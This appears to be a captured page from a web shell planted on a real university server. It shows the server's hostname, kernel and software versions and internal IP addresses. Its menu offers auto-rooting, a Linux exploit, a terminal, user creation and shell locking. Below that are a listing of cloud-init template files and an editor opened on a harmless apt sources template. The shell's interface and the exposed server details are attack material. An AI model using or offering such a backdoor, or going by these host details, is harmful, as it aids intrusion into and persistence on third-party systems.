Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
snap /
core22 /
2139 /
etc /
cloud /
templates /
[ HOME SHELL ]
Name
Size
Permission
Action
chef_client.rb.tmpl
1.63
KB
-rw-r--r--
chrony.conf.almalinux.tmpl
1.25
KB
-rw-r--r--
chrony.conf.alpine.tmpl
1.18
KB
-rw-r--r--
chrony.conf.centos.tmpl
1.25
KB
-rw-r--r--
chrony.conf.cloudlinux.tmpl
1.25
KB
-rw-r--r--
chrony.conf.cos.tmpl
873
B
-rw-r--r--
chrony.conf.debian.tmpl
1.18
KB
-rw-r--r--
chrony.conf.fedora.tmpl
1.34
KB
-rw-r--r--
chrony.conf.freebsd.tmpl
13.98
KB
-rw-r--r--
chrony.conf.opensuse-leap.tmpl
1.06
KB
-rw-r--r--
chrony.conf.opensuse-microos.tmpl
1.06
KB
-rw-r--r--
chrony.conf.opensuse.tmpl
1.06
KB
-rw-r--r--
chrony.conf.opensuse-tumbleweed.tmpl
1.06
KB
-rw-r--r--
chrony.conf.photon.tmpl
1.34
KB
-rw-r--r--
chrony.conf.rhel.tmpl
1.25
KB
-rw-r--r--
chrony.conf.rocky.tmpl
1.25
KB
-rw-r--r--
chrony.conf.sle_hpc.tmpl
1.06
KB
-rw-r--r--
chrony.conf.sle-micro.tmpl
1.06
KB
-rw-r--r--
chrony.conf.sles.tmpl
1.06
KB
-rw-r--r--
chrony.conf.ubuntu.tmpl
1.35
KB
-rw-r--r--
hosts.alpine.tmpl
893
B
-rw-r--r--
hosts.aosc.tmpl
931
B
-rw-r--r--
hosts.arch.tmpl
841
B
-rw-r--r--
hosts.azurelinux.tmpl
882
B
-rw-r--r--
hosts.debian.tmpl
845
B
-rw-r--r--
hosts.freebsd.tmpl
911
B
-rw-r--r--
hosts.gentoo.tmpl
910
B
-rw-r--r--
hosts.mariner.tmpl
876
B
-rw-r--r--
hosts.photon.tmpl
874
B
-rw-r--r--
hosts.redhat.tmpl
912
B
-rw-r--r--
hosts.suse.tmpl
1.04
KB
-rw-r--r--
ntp.conf.almalinux.tmpl
1.86
KB
-rw-r--r--
ntp.conf.alpine.tmpl
255
B
-rw-r--r--
ntp.conf.cloudlinux.tmpl
1.86
KB
-rw-r--r--
ntp.conf.debian.tmpl
2.15
KB
-rw-r--r--
ntp.conf.fedora.tmpl
2.08
KB
-rw-r--r--
ntp.conf.freebsd.tmpl
4.13
KB
-rw-r--r--
ntp.conf.opensuse.tmpl
2.74
KB
-rw-r--r--
ntp.conf.photon.tmpl
1.86
KB
-rw-r--r--
ntp.conf.rhel.tmpl
1.86
KB
-rw-r--r--
ntp.conf.rocky.tmpl
1.86
KB
-rw-r--r--
ntp.conf.sles.tmpl
2.74
KB
-rw-r--r--
ntp.conf.ubuntu.tmpl
2.5
KB
-rw-r--r--
ntpd.conf.openbsd.tmpl
543
B
-rw-r--r--
resolv.conf.tmpl
921
B
-rw-r--r--
sources.list.debian.deb822.tmpl
1.52
KB
-rw-r--r--
sources.list.debian.tmpl
1.41
KB
-rw-r--r--
sources.list.ubuntu.deb822.tmpl
3.02
KB
-rw-r--r--
sources.list.ubuntu.tmpl
2.45
KB
-rw-r--r--
systemd.resolved.conf.tmpl
504
B
-rw-r--r--
timesyncd.conf.tmpl
203
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sources.list.debian.deb822.tmpl
## template:jinja ## Note, this file is written by cloud-init on first boot of an instance ## modifications made here will not survive a re-bundle. ## if you wish to make changes you can: ## a.) add 'apt_preserve_sources_list: true' to /etc/cloud/cloud.cfg ## or do the same in user-data ## b.) add supplemental sources in /etc/apt/sources.list.d ## c.) make changes to template file ## /etc/cloud/templates/sources.list.debian.deb822.tmpl # For how to upgrade to newer versions of the distribution, see: # http://www.debian.org/releases/stable/i386/release-notes/ch-upgrading.html ## See the sources.list(5) manual page for further settings. ## Comment any of the following Suites to avoid getting updates from the ## specific Suite. ## ## N.B. software from {{codename}}-backports repository may not have been ## tested as extensively as that contained in the main release, although it ## includes newer versions of some applications which may provide useful ## features. Types: deb deb-src URIs: {{mirror}} Suites: {{codename}} {{codename}}-updates {{codename}}-backports Components: main Signed-By: {{primary_key | default('/usr/share/keyrings/debian-archive-keyring.gpg', true)}} ## Major bug fix updates produced after the final release of the distribution. Types: deb deb-src URIs: {{security}} Suites: {{codename}}{% if codename in ('buster', 'stretch') %}/updates{% else %}-security{% endif %} Components: main Signed-By: {{security_key | default(primary_key, true) | default('/usr/share/keyrings/debian-archive-keyring.gpg', true)}}
Close